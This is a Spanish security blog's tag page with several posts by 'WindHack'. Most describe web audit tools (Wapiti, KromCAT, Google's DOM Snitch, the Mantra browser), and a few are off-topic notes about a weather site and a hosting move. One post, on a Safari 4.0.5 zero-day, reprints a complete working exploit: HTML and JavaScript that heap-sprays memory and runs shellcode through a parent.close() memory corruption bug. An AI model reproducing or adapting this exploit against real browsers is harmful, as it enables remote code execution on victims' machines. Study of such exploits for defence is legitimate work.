Entradas etiquetadas con web

Wapiti

Wapiti – Web application vulnerability scanner

22 oct

Publicado por WindHack en Inseguridad Informática

1 comentario

Wapiti es una aplicación que permite auditar la seguridad de sus aplicaciones web. No estudia el código fuente de la aplicación, pero va a escanear las páginas web de la webapp, en busca de scripts y de formas en las que se puedan inyectar datos. Posteriormente, Wapiti actúa como un fuzzer, inyectando payloads para ver si es vulnerable.

Se pueden detectar las siguientes vulnerabilidades:

  • Errores en el manejo de archivos (local y remote include/require, fopen, readfile…)
  • Inyecciones en base de datos (PHP/JSP/ASP SQL e inyecciones XPath)
  • XSS (Cross Site Scripting).
  • Inyección LDAP
  • Detección de comandos de ejecución (eval (), system (), passtru ()…)
  • CRLF

Wapiti no se basa en una base de datos de vulnerabilidades como lo hace Nikto, a pesar de que integra su base de datos como un tipo de ataque desde la versión 2.2.1

Wapiti tiene como objetivo descubrir vulnerabilidades desconocidas en las aplicaciones web.

No proporciona una interfaz gráfica para el momento y hay que usarlo desde un terminal.

Wapiti es capaz de crear informes completos que incluyen todas las vulnerabilidades encontradas y la información relacionada con el fin de ayudar a solucionarlos.

Descargar
Clima

Sitio web ideal para obtener el clima de una ciudad

7 ago

Publicado por WindHack en Off-Topic

No hay comentarios

Pues bueno, navegando un poco con DuckDuckGo me encontré que al escribir el goodie “temp in [Ciudad]” daba los datos climáticos del momento.

Mirando ese resultado, pude ver que los datos los da gracias al sitio WorldWeatherOnline, y sin más rodeos le eché un vistazo y realmente me agradó, ya que da una información bastante fiable y concreta. Pensé que mi pueblo, por ser algo muy pequeño no serviría y me redonderaría el dato hacia una ciudad que queda a aproximadamente 1 hr. y, mi mayor sorpresa fue ver que inclusive daba los datos de un corregimiento.

Además, vale decir que se puede obtener información por medio de IP, código postal, etc.

Es bastante interesante este sitio, podéis mirarle un poco.

Sitio webWorldWeatherOnline

KromCAT

KromCAT: Convierte Chrome en una herramienta de auditorías

24 jul

Publicado por WindHack en Inseguridad Informática

No hay comentarios

Hace algún tiempo os presenté Mantra. Un navegador basado en Mozilla Firefox y que se combinaba con el proyecto FireCAT para convertirlo en una potente herramienta para realizar auditorías de seguridad, pero como es mejor tener una lista de dónde elegir, hoy os vengo a presentar el proyecto KromCAT.

 

 

KromCAT es un conjunto de extensiones para el navegador Google Chrome especialmente diseñado para realizar auditorías de seguridad. Actualmente se encuentra en la versión 1.0 Beta y contiene más de 38 extensiones divididas en 7 categorías ( Ver imagen ).

KromCAT (HTML) KromCAT (FreeMind)

Google

Google lanza una herramienta para detectar vulnerabilidades en aplicaciones web

24 jun

Publicado por WindHack en Noticias

No hay comentarios

Google ha lanzado una nueva herramienta denominada DOM Snitch destinada a desarrolladores que permite verificar si las aplicaciones web que han creado son vulnerables a ataques y ponen en peligro la seguridad de los usuarios de Chrome. La herramienta que lanza Google es una extensión de Chrome en fase experimental permite a los desarrolladores y testeadores “identificar las prácticas inseguras que se encuentran en el código del lado del cliente”.

DOM Snitch se une así a otras herramientas open source como Skipfish y Ratproxy que Google ofrece para comprobar la seguridad de aplicaciones web.

La nueva herramienta de Google, como elemento diferenciador, se puede utilizar en tiempo real, los desarrolladores pueden observar modificaciones DOM cuando ocurren dentro del navegador sin necesidad de desplazarse por el código JavaScript con un depurador o pausando la ejecución de su aplicación.

Por otro lado, según Google, es una herramienta fácil de usar, con las función de seguridad heurística y las vistas anidadas, tanto a los desarrolladores avanzados como los menos expertos pueden detectar áreas de la aplicación que se está probando que necesitan más atención de forma rápida.

Además, con esta herramienta será posible compartir experiencias, permite a los desarrolladores exportar y compartir fácilmente capturado modificaciones DOM, “para resolver Más >

Mantra

Mantra: navegador para auditorías de seguridad

23 jun

Publicado por WindHack en Inseguridad Informática

No hay comentarios

Mantra es un navegador cuyo objetivo es ser una herramienta primordial para las auditorías de seguridad. Está basado en Mozilla Firefox, y es una compilación personalizada, de versión portable, fácil uso y totalmente configurable. Se encuentra disponible para los sistemas operativos GNU/Linux, Windows y MacOS.

En su versión actual, han decidido unir su proyecto con FireCAT, el cual es un conjunto de extensiones clasificadas y bien organizadas sobre auditoría en seguridad.

Ahora Mantra cuenta con las siguientes herramientas:

  • Information Gathering
    • Whois
      • Flagfox
    • Location Info
      • Flagfox
    • Enumeration and Fingerprint
      • Host Spy
      • JSView
      • PassiveRecon
      • View Dependencies
      • Wappalyzer
    • Data Mining
      • People Search Engine
      • Facebook search
  • Editors
    • Cert Viewer Plus
    • Firebug
    • JSView
  • Network Utilities
    • Protocols and applications
      • FTP
        • Fire FTP
      • DNS
        • DNS Cache
      • SQL
        • SQLite Manager
    • Sniffers
      • HTTP Fox
    • Password
      • CryptoFox 2.0
  • Misc
    • Tweaks and Hacks
      • Greasemonkey
      • Scripts
    • Malware scanner
      • Web of Trust
    • Automation
      • iMacros
    • Others
      • CacheToggle 0.6
      • URL Flipper
  • Application Auditing
    • Hackbar
    • JavaScript Deobfuscator
    • RESTClient
    • Tamper Data
    • Live HTTP Headers
    • RefControl
    • User Agent Switcher
    • Web Developer
    • DOM Inspector
    • Inspect This
    • Formfox
    • Exploit Me
      • Access Me
      • SQL Inject Me
      • XSS Me
    • Cookies
      • Cookies Manager+ 1.5.1
      • Firecookie
  • Proxy
    • FoxyProxy Standard 2.22.6
    • HttpFox

Descargar (Beta 0.61)

Para obtener más información puedes visitar la página oficial de Mantra.

Más >
security-medium

0-Day en el navegador web Safari

13 may

Publicado por WindHack en Inseguridad Informática

1 comentario

Una empresa holandesa, Secunia, ha detectado un fallo crítico en el navegador Safari que permite ejecutar código malicioso. Éste fue detectado en la versión 4.5 del navegador, y corriendo en Windows 7, aunque no se descarta que pueda ocurrir en otras versiones y en Mac.

Al parecer, el problema puede provenir de la apertura de las nuevas ventanas, pues en el momento de cerrar el pop up, si éste viene de páginas o correos en HTML malicioso, se abre inequívocamente la puerta a la instalación y ejecución de malware.

De momento, Apple no ha confirmado nada, por lo que no se ha lanzado ningún parche de seguridad. Sin embargo, los expertos recomiendan tener cuidado con los mensajes que se abren vía webmail e inhabilitar el javascript de aquellas páginas que no nos creen mucha confianza.

Exploit:

<!--
Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) &lt;h07@interia.pl&gt;
Tested on: Apple Safari 4.0.5 / XP SP2 Polish
Shellcode: Windows Execute Command (calc)
Local: Yes
Remote: Yes (POPUP must be enabled [Ctrl+Shift+K])
Just for fun ;)
-->
 
<!---------------------------------REMOTE.htm--------------------------------->
<script>
window.open("0day.htm"); //parent.close() activation
self.close();
</script>
-----------------------------------REMOTE.htm-------------------------------->
 
<!---------------------------------0day.htm---------------------------------->
<h1>Alt + F4 :)</h1>
 
<script>
function make_buf(payload, len) {
    while(payload.length &lt; (len * 2)) payload += payload;
    payload = payload.substring(0, len);
    return payload;
}
 
var shellcode = unescape("%u9090%u9090"+ //Windows Execute Command (calc)
"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063");
 
 
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length&lt;slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace&lt;0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i&lt;1000;i++) memory[i] = block + shellcode;
 
var a = parent;
var buf = make_buf("AAAA", 10000);
 
for(var i = 0; i &lt;= 1; i++) {
    a.prompt(alert);
    a.prompt(buf);
    a.close();
}
</script>
<!---------------------------------0day.htm---------------------------------->
Más >
Nuevo

Nuevo hosting y dominio

23 abr

Publicado por WindHack en Off-Topic

4 comentarios

Así es , hemos cambiado de hosting y dominio gratuito por uno pagado, por tal motivo y algunos asuntos personales he estado un poco offline.

Espero ésta inversión ayude a mejorar nuestra pequeña pero entusista web.

Ahora si acceden a la anterior dirección (http://daw-labs.co.cc) serán redireccionados de inmediato a la nueva (http://daw-labs.com).

Un fuerte abrazo.